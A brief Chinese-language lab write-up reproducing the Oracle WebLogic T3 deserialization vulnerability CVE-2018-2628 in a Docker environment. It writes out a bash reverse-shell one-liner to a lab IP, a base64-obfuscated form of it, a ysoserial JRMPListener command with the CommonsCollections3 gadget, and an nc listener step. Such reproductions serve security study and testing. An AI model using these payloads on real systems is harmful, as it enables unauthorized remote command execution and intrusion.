Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。
漏洞环境
cd weblogic/CVE-2018-2628
docker-compose up -d
docker-compose config
等待环境启动,访问http://10.10.10.8:7001/console
漏洞复现
- base64译反弹shell命令,编译网站
bash -i >& /dev/tcp/10.10.10.128/4444 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}
- 本地使用yso启动jrmp,工具中填入本地的jrmp地址
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"
- nc监听反弹的shell
连接成功!!!